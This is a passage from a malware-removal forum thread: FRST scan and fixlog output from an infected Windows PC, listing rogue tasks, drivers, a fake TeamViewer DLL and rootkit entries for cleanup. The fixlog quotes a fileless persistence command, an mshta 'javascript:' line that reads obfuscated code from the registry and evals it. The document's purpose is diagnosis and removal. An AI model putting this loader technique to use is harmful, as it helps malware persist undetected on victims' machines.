2018-06-12 20:13 - 2018-06-12 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\sietnkv
2018-06-11 23:07 - 2018-06-11 23:07 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-06-11 21:38 - 2018-06-11 21:38 - 000000000 ____D C:\Users\Dan\AppData\Local\vsdkhmb
2018-06-11 21:17 - 2018-06-11 21:17 - 000000000 ____D C:\Users\Dan\AppData\Local\cwkbude
2018-06-11 20:54 - 2018-06-11 20:54 - 000000000 ____D C:\Users\Dan\AppData\Local\ianhgkz
2018-06-11 20:14 - 2018-06-11 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\spnamrh
2018-06-10 20:19 - 2018-06-10 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdhvpka
2018-06-09 19:36 - 2018-06-09 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\psnwzov
2018-06-08 20:22 - 2018-06-08 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\sprxnmw
2018-06-07 20:25 - 2018-06-07 20:25 - 000000000 ____D C:\Users\Dan\AppData\Local\zaothbn
2018-06-06 20:16 - 2018-06-06 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\upcnzih
2018-06-05 20:19 - 2018-06-05 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdavblr
2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe
2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk
2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde
2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo
2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}
2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg
2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw
2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk
2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup
2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp
2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx
2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix
2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg
2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch
2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad
2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep
2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol
2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue
2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl
2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo
2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm
2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc
2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-12 20:45 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
2018-06-12 20:43 - 2016-03-03 14:05 - 000000000 ____D C:\FRST
2018-06-12 20:40 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-06-12 20:37 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive
2018-06-12 20:37 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe
2018-06-12 20:36 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware
2018-06-12 20:35 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre
2018-06-12 20:35 - 2018-03-22 21:52 - 000000364 _____ C:\ProgramData\rwi.hhad
2018-06-12 20:34 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr
2018-06-12 20:34 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-12 20:33 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe
2018-06-12 20:33 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE
2018-06-12 20:33 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2018-06-11 23:07 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer
2018-06-11 22:36 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-06-11 21:59 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF
2018-06-10 22:57 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio
2018-06-09 23:31 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc
2018-06-08 20:32 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf
2018-06-07 21:59 - 2016-08-26 20:21 - 000000000 ____D C:\Users\Dan\Documents\A - RESTORED FILES - DAN
2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts
2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics
2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump
2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps
2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}
2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}
2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}
2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}
2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}
2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5
2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0
2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8
 
==================== Files in the root of some directories =======
 
2018-03-22 21:52 - 2018-06-12 20:45 - 000000004 _____ () C:\ProgramData\lock.dat
2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe
2017-03-29 19:14 - 2018-06-12 20:40 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part
2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS
2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part
2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel
2018-06-11 23:07 - 2018-06-11 23:07 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
C:\Windows\system32\drivers\cooybehl.sys -> Access Denied <======= ATTENTION
 
LastRegBack: 2018-05-29 22:18
 
==================== End of FRST.txt ============================


#30 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 13 June 2018 - 06:10 PM

Here's the Fixlog txt

 

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (12-06-2018 20:31:27) Run:2
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
C:\ProgramData\dahhService\
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
C:\Users\Dan\AppData\Local\aucozre\
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
C:\ProgramData\TeamVieverService.dll
BHO-x32: Java� Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java� Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-05-29]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-05-29]
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha
C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre
HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)
C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 ehkoru; system32\drivers\knruxb.sys [X]
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
2018-05-30 23:23 - 2018-05-30 23:23 - 000142672 ____N C:\Windows\system32\Drivers\cooeilos.sys
2018-05-31 20:24 - 2018-03-22 21:52 - 000000292 _____ C:\ProgramData\rwi.hhad
C:\Users\Dan\AppData\Roaming\sp_data.sys
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
C:\Windows\system32\drivers\cooeilos.sys -> Access Denied <======= ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
C:\Windows\system32\mshta.exe
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
C:\Program Files (x86)\pAuZbg.exe
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
C:\Program Files (x86)\YuIeaAuVrYQ.exe
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) ??????????????????????
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) ??????????????????????e
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) ????????????????????????????
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) ????????????????????????????e
C:\Program Files (x86)\s5
R3 knquxa; system32\drivers\qtxadh.sys [X]
2018-06-04 20:42 - 2018-06-04 20:42 - 000142672 ____N C:\Windows\system32\Drivers\cooorvyb.sys
2018-06-04 20:59 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
 
 
*****************
 
 
==== End of Fixlog 20:31:27 ====





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users